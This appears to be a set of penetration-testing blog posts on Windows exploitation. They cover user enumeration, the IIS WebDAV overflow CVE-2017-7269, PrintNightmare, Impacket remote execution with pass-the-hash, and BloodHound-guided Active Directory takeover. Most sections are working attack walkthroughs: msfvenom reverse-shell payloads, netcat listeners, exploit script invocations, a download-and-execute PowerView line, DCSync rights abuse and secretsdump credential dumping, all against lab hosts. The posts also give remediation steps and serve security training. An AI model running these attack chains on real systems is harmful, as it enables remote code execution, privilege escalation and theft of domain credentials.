Windows Local user & local enumeration

by Vry4n_ | Dec 22, 2021 | Windows Exploitation

In this article we will learn to enumerate users and groups manually.

1. Check the current user

• echo %USERNAME% || whoami
• whoami

Powershell

• env:username

2. View the logged in user privileges

• whoami /priv

3. Display the user groups to which the current user belongs.

• whoami /groups

4. See the local users

• net user

Note: User1 is not listed as it is a Domain user

5. To view all users including local and domain users that have logged in to this machine

• whoami /all

6. You can also see local users using powershell

• Get-LocalUser
• Get-LocalUser | Select-Object -Property Name,Enabled,LastLogon

7. We could also get usernames by inspecting the users directory (C:/Users)

• Get-ChildItem C:/Users -Force
• Get-ChildItem C:/Users -Force | Select Name

8. The "Net Accounts" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. This command is only used on local computer.

• net accounts

9. Learn more about a specific local user

• net user administrator

10. net localgroup displays the name of the server and the names of local groups on the computer.

• net localgroup

11. you can also get the local groups using Powershell

• Get-LocalGroup
• Get-LocalGroup | ft Name

12. You can also see the users that belong to a group

• net localgroup administrators

13. You can also get user membership using powershell

• Get-LocalGroupMember Administrators
• Get-LocalGroupMember Administrators | ft Name,PrincipalSource

Microsoft IIS ScStoragePathFromUrl function buffer overflow – CVE-2017-7269

by Vry4n_ | Sep 17, 2021 | Windows Exploitation

Microsoft IIS is vulnerable to a buffer overflow, caused by improper bounds checking by the ScStoragePathFromUrl function in the WebDAV service. By sending an overly long header beginning with If: http:// in a PROPFIND request, a remote attacker could overflow a buffer and execute arbitrary code on the system.

Affected Products

Microsoft IIS 6.0

Detection

Nmap

• nmap -T4 -p80 --script=http-iis-webdav-vuln 10.10.10.15

• nmap --script http-webdav-scan -p80 10.10.10.14

Exploitation (Metasploit)

1. For this we will use the module (iis_webdav_scstoragepathfromurl)

• search cve:2017-7269
• use exploit/windows/iis/iis_webdav_scstoragepathfromurl
• show options

2. Set the required options in this case

• set RHOSTS 10.10.10.15
• set RPORT 80
• set LHOST 10.10.14.4
• set LPORT 4444
• run

3. Once, we get the connection back we can get out shell

• shell

Note: You can use different payloads other than meterpreter, example windows/shell/reverse_tcp

1. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/danigargu/explodingcan)

1. Download the script from GitHub

• git clone https://github.com/danigargu/explodingcan.git
• cd explodingcan
• ls

2. Using MSFVenom create a payload in shellcode, and save it to a file

• msfvenom -p windows/shell_reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.4 LPORT=4455 > shellcode_rev

3. Now start a netcat listener

• nc -lvp 4455

4. Run the script and pass the reverse shellcode as argument

• python explodingcan.py http://10.10.10.15 shellcode_rev

5. Now check the listener

2. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)

1. Download the script from GitHub

• git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
• cd iis6-exploit-2017-CVE-2017-7269
• ls

2. Now start a netcat listener

• nc -lvp 4455

3. Run the script and pass the arguments it needs, you can rename the script to add .py extension

• python "iis6 reverse shell" 10.10.10.14 80 10.10.14.4 4455

4. Now check the listener, we should have a shell back

• whoami

Remedy

Refer to Microsoft KB3197835 for patch, upgrade or suggested workaround information.

References

https://packetstormsecurity.com/files/142060

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269

https://bugtraq.securityfocus.com/archive

https://exchange.xforce.ibmcloud.com/vulnerabilities/123756

https://www.f5.com/labs/articles/threat-intelligence/windows-iis-60-cve-2017-7269-is-targeted-again-to-mine-electroneum

https://nvd.nist.gov/vuln/detail/CVE-2017-7269

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

by Vry4n_ | Jul 4, 2021 | Windows Exploitation

Microsoft Windows could allow a remote attacker to gain elevated privileges on the system, caused by a flaw in the Print Spooler component. By persuading a victim to open specially-crafted content, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges.

This service spools print (Print Spooler) jobs and handles interaction with the printer. If you turn off this service, you won’t be able to print or see your printers.

The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.

The RpcAddPrinterDriverEx() function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer.

An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe executing code in an arbitrary DLL file with SYSTEM privileges.

Exploit code for this vulnerability that targets Active Directory domain controllers is publicly available as PrintNightmare. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB.

I will use for this demo https://github.com/cube0x0/CVE-2021-1675

Affected Products

• Microsoft Windows Server 2008 SP2 x32
• Microsoft Windows Server 2008 SP2 x64
• Microsoft Windows 7 SP1 x32
• Microsoft Windows 7 SP1 x64
• Microsoft Windows Server 2008 R2 SP1 x64
• Microsoft Windows Server 2012
• Microsoft Windows 8.1 x32
• Microsoft Windows 8.1 x64
• Microsoft Windows Server 2012 R2
• Microsoft Windows RT 8.1
• Microsoft Windows 10 x32
• Microsoft Windows 10 x64
• Microsoft Windows Server 2016
• Microsoft Windows Server 2019
• Microsoft Windows 10 ARM64
• Microsoft Windows 10 1809 for x64-based Systems
• Microsoft Windows 10 1809 for 32-bit Systems
• Microsoft Windows 10 1809 for ARM64-based Systems
• Microsoft Windows 10 1607 for 32-bit Systems
• Microsoft Windows 10 1607 for x64-based Systems
• Microsoft Windows 10 2004 for 32-bit Systems
• Microsoft Windows 10 2004 for ARM64-based Systems
• Microsoft Windows 10 2004 for x64-based Systems
• Microsoft Windows 10 1909 for 32-bit Systems
• Microsoft Windows 10 1909 for x64-based Systems
• Microsoft Windows 10 1909 for ARM64-based Systems
• Microsoft Windows 10 20H2 for 32-bit Systems
• Microsoft Windows 10 20H2 for ARM64-based Systems
• Microsoft Windows 10 20H2 for x64-based Systems
• Microsoft Windows Server (Server Core installation) 2019
• Microsoft Windows Server (Server Core installation) 2004
• Microsoft Windows Server (Server Core installation) 20H2
• Microsoft Windows Server (Server Core installation) 2016
• Microsoft Windows Server (Server Core installation) 2012 R2
• Microsoft Windows Server (Server Core installation) 2012
• Microsoft Windows Server for X64-based systems (Server Core installation) 2008 SP2
• Microsoft Windows Server for 32-bit systems (Server Core installation) 2008 SP2
• Microsoft Windows Server for X64-based systems (Server Core installation) 2008 R2 SP1
• Microsoft Windows 10 21H1 for 32-bit Systems
• Microsoft Windows 10 21H1 for ARM64-based Systems
• Microsoft Windows 10 21H1 for x64-based Systems

For this vulnerability to work the Print Spooler needs to be enabled (Running)

Also, we would need RPC to be an open port at the server side

• nmap -p 135 192.168.0.100

How to exploit

For this we will need a user & password for the domain controller. This is done from remote

1. Having already a shell & user credentials, we will first see if Spool service is running

• Powershell.exe Get-Service Spool

Note: we can also use impaket tools to determine if the server is running the service

• python3.9 /opt/impacket/examples/rpcdump.py @192.168.0.100 | grep MS-RPRN

2. Start a SMB server with anonymous log in enabled, the name of the share is going to be smb which will be hosting /tmp. First, I will edit /etc/samba/smb.conf

[global]

map to guest = Bad User

server role = standalone server

usershare allow guests = yes

idmap config * : backend = tdb

smb ports = 445

public = yes

security = user

[smb]

comment = Samba

path = /tmp/

guest ok = yes

read only = no

browsable = yes

writable = yes

force user = nobody

public = yes

• sudo vi /etc/samba/smb.conf

3. Now start the SMB service

• sudo service smbd start
• sudo service smbd status

Note: If the service is already running just restart smbd “sudo service mbd restart”

4. Now test the share, it should be with at least READ permissions

• smbmap -H 192.168.0.13

5. In the SMB server create a DLL reverse shell, I’ll use msfvenom, locate it within the share

• msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.13 LPORT=5555 -f dll > rev.dll
• ls rev.dll

6. Start a netcat listener

• nc -lvp 5555

6. Download the script (https://github.com/cube0x0/CVE-2021-1675), I’ll place it in /tmp

• cd /tmp
• git clone https://github.com/cube0x0/CVE-2021-1675.git

6. Run the script to see its options

• cd /tmp/CVE-2021-1675
• python3.9 CVE-2021-1675.py

Note: Before running the script you may need to install the version for impacket for this script to work

• sudo apt remove --purge impacket-scripts python3-impacket
• sudo apt autoremove
• pip3 uninstall impacket
• git clone https://github.com/cube0x0/impacket #you can also use https://github.com/SecureAuthCorp/impacket
• cd impacket
• pip install .
• sudo python3 ./setup.py install

7. Run the script using the domain controller IP / username / password / SMB reverse shell path

• python3 ./CVE-2021-1675.py vk9-sec.com/user1:Password1@192.168.0.100 '\\192.168.0.13\smb\rev.dll'

Note: In my case it seems to error, but the payload gets executed

8. Now check the netcat listener, we should have a session with NT Authority \ System rights

• whoami

Extra

1. The user I used to exploit this vulnerability has only Domain Users rights

• net user user1

Remedy

Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to search for available patches.

Alternative: This vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.

Mitigation

Disable Spooler service

Powershell

• Stop-Service Spooler -Force
• Set-Service -Name Spooler -StartupType Disabled

Registry

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f

(Alternative) Uninstall Print-Services

• Uninstall-WindowsFeature Print-Services

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/202477

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675

https://github.com/cube0x0/CVE-2021-1675

https://www.kb.cert.org/vuls/id/383432

https://github.com/afwu/PrintNightmare

https://github.com/LaresLLC/CVE-2021-1675

https://github.com/calebstewart/CVE-2021-1675

https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/

https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/

Impacket Remote code execution (RCE) on Windows from Linux

by Vry4n_ | Jun 20, 2021 | Windows Exploitation

Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools.

Impacket can work with plain, NTLM and Kerberos authentications, fully supporting passing-the-hash (PTH) attacks and more.

https://github.com/SecureAuthCorp/impacket

Psexec.py

This method is very similar to the traditional PsExec from SysInternals. In this case, however, Impacket uses RemComSvc utility.

The way it works is that Impacket will upload the RemComSvc utility on a writable share on the remote system and then register it as a Windows service.

This will result in having an interactive shell available on the remote Windows system via port tcp/445.

“You have to have administrator to PSExec.”

Requirements for PSExec

• Write a file to the share.
• Create and start a service.

https://0xdf.gitlab.io/2020/01/26/digging-into-psexec-with-htb-nest.html

How to use

1. It comes installed already in Kali, you can use whereis to see if it is already installed.

• whereis psexec
• psexec.py -h

2. If you don’t have it download it

• git clone https://github.com/SecureAuthCorp/impacket.git
• cd impacket
• find . -iname *psexec* 2> /dev/null
• python3.9 ./examples/psexec.py -h

2. Basic SMB session using user/password combination. You have to be administrator or have SVCManager service rights

Successful (Administrator user)

• python3.9 ./examples/psexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

Unsuccessful (Regular user)

• python3.9 ./examples/psexec.py vk9-sec/user1:Password1@192.168.0.100

Note: We get an error when using a regular account, in this case we have a Writable directory, but, we don’t have permissions to run SVCManager (Error opening SVCManager on 192.168.0.100)

3. Debug while running, in this case we get “Access Denied”

• python3.9 ./examples/psexec.py vk9-sec/user1:Password1@192.168.0.100 -debug

4. Connect using a hash

• python3.9 ./examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

5. Specify a port (if SMB is using other than 445)

• python3.9 ./examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100 -port 445

6. Specify the name of the file that will be uploaded

• python3.9 ./examples/psexec.py vk9-sec/vry4n:Admin.1@192.168.0.100 -remote-binary-name EXAMPLE-FILE

SMBexec.py

Smbexec.py method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system.

This approach does not require anything to be uploaded on the remote system and is therefore somewhat less noisy.

Note that the communication happens solely over port tcp/445.

Smbexec.py uses a similar approach to psexec w/o using RemComSvc. This script works in two ways:

• share mode: you specify a share, and everything is done through that share.
• server mode: if for any reason there’s no share available, this script will launch a local SMB server, so the output of the commands executed is sent back by the target machine into a locally shared folder. Keep in mind you would need root access to bind to port 445 in the local machine.

How to use

1. Display the tool basic menu

• python3.9 ./examples/smbexec.py -h

2. Basic session

• python3.9 ./examples/smbexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Using hashes

• python3.9 ./examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

wmiexec.py

wmiexec.py uses Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell.

Similarly as dcomexec method, wmiexec requires communication over 3 network ports / services.

First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911.

This makes the wmiexec method more noisy than the other methods.

How to use

1. Display the tool help menu

• python3.9 ./examples/wmiexec.py -h

2. Basic connection

• python3.9 ./examples/wmiexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Connecting using hashes

• python3.9 ./examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

atexec.py

atexec.py uses the Task Scheduler service (Atsvc) on the remote Windows system to execute a supplied command. All network communication takes place over port tcp/445.

How to use

1. Display basic help menu

• python3.9 ./examples/atexec.py -h

2. Basic connection and command execution

• python3.9 ./examples/atexec.py vk9-sec/vry4n:Admin.1@192.168.0.100 systeminfo

3. Using a hash

• python3.9 ./examples/atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100 systeminfo

dcomexec.py

Dcomexec.py method uses various DCOM endpoints such as MMC20.Application, ShellWindows or ShellBrowserWindow objects to spawn a semi-interactive shell on the remote system.

Using this method requires communication on multiple network ports (tcp/135, tcp/445) and internally utilizes the DCOM subsystem of the remote Windows system using a dynamically allocated high port such as tcp/49751

This generally makes this method somewhat more noisy that the other methods.

How to use

1. Display the basic help menu

• python3.9 ./examples/dcomexec.py -h

2. Basic connection

• python3.9 ./examples/dcomexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Using a hash

• python3.9 ./examples/dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vk9-sec/vry4n@192.168.0.100

Mapping AD relationship using BloodHound

by Vry4n_ | Jun 19, 2021 | Windows Exploitation

BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths. It does so by using graph theory to find the shortest path for an attacker to traverse to elevate their privileges within the domain.

How Does BloodHound Work?

BloodHound itself is a Web application that's compiled with Electron so that it runs as a desktop app. Its true power lies within the Neo4j database that it uses. Neo4j is a special kind of database -- it's a graph database that can easily discover relationships and calculate the shortest path between objects by using its links.

BloodHound collects data by using an ingestor called SharpHound. It comes as a regular command-line .exe or PowerShell script containing the same assembly (though obfuscated) as the .exe. As it runs, SharpHound collects all the information it can about AD and its users, computers and groups. It even collects information about active sessions, AD permissions and lots more by only using the permissions of a regular user.

SharpHound outputs JSON files that are then fed into the Neo4j database and later visualized by the GUI. This also means that an attacker can upload these files and analyze them with BloodHound elsewhere.

Disclaimer: BloodHound is very noisy, running it on a monitored system will trigger alerts.

https://github.com/BloodHoundAD/BloodHound

Download

1. Download BloodHound, access the folder and look for the executable files

• git clone https://github.com/BloodHoundAD/BloodHound.git
• cd BloodHound
• find . -iname *.exe 2> /dev/null

2. In the same GitHub page go to releases, and, download the executable from there. I’d download BloodHound-linux-x64.zip (For Linux)

• https://github.com/BloodHoundAD/BloodHound/releases
• wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.2/BloodHound-linux-x64.zip

3. Unzip the downloaded file

• unzip BloodHound-linux-x64.zip

5. Install neo4j

• sudo apt install neo4j

Set Up

1. Start neo4j

• sudo neo4j console

2. Access web site it indicates, in my case

• http://localhost:7474

3. Access the web console using the default credentials, then, change the password

• neo4j / neo4j

4. Now go to the BloodHound folder and execute it

• cd BloodHound-linux-x64
• ./BloodHound --no-sandbox

5. Enter neo4j credentials

• neo4j / admin

Collect the data from the Windows host

In this example, I set a SMB server using impaket-smbserver. Placed the SharpHound.exe file in the SMB partition, then ran and saved the output file in the same location

1. Set SMB server

• impacket-smbserver smbfolder $(pwd) -smb2support -user vk9guest -password vk9pass

2. In the host run the following powershell commands

• $pass = convertto-securestring 'vk9pass' -AsPlainText -Force
• $cred = New-Object System.Management.Automation.PSCredential('vk9guest', $pass)
• New-PSDrive -Name vk9smb2 -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder
• cd vk9smb2:
• dir

3. Now, run SharpHound.exe

• .\SharpHound.exe -c all

4. A .zip file will be generated at the working directory location. Copy that to your Linux machine and import it into BloodHound. Click on upload data in the right menu

5. Wait for the data to be uploaded

6. In the search bar you can search for any AD object to map. I will query svc-alfresco

7. Under database info you can find stats

8. Under node info, after you select a node, you can find details about it

9. Under the Analysis tab you can find queries to run against the node

10. You can click on your node and run a query; I will run “Shortest Path from Kerberos users”

11. Click on the domain box at the top, to display a map based on the query type

12. In this example we see our user is part of the following groups

• SERVICE ACCOUNTS@HTB.LOCAL
• PRIVILEGED IT ACCOUNTS@HTB.LOCAL
• ACCOUNT OPERATORS@HTB.LOCAL

Note: Based on Microsoft account operators have the ability to add users (https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#:~:text=The%20Account%20Operators%20group%20grants,in%20locally%20to%20domain%20controllers.&text=Members%20of%20this%20group%20cannot%20modify%20user%20rights.)

The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.

13. Knowing our user is part of account operators we can proceed to add a user to one of the existing groups. I will add it to “EXCHANGE WINDOWS PERMISSIONS”

• net user vry4n Password1 /add /domain
• net group "EXCHANGE WINDOWS PERMISSIONS"
• net group "EXCHANGE WINDOWS PERMISSIONS" /add vry4n
• net group "EXCHANGE WINDOWS PERMISSIONS"

14. If you right click the link between nodes and click Help you will find abusing recommendations

Extra

We will follow the Steps shown by the tool, we will use PowerSploit (PowerView.ps1) script

1. Download powersploit

• git clone https://github.com/PowerShellMafia/PowerSploit.git
• cd PowerSploit/Recon

2. Start a web server at the Linux machine where the script is located

• python3.9 -m http.server 8888

3. From the windows machine connect to the web server

• IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8888/PowerView.ps1')

4. Now execute the following

• $SecPassword = ConvertTo-SecureString 'Password1' -AsPlainText -Force
• $Cred = New-Object System.Management.Automation.PSCredential('HTB\vry4n', $SecPassword)
• Add-DomainObjectAcl -Credential $Cred -TargetIdentity ' DC=htb,DC=local' -PrincipalIdentity vry4n -Rights DCSync

5. Now that we added to DCSync we can try impaket secrets dump, we can get hashes

• sudo secretsdump.py htb.local/vry4n:Password1@10.10.10.161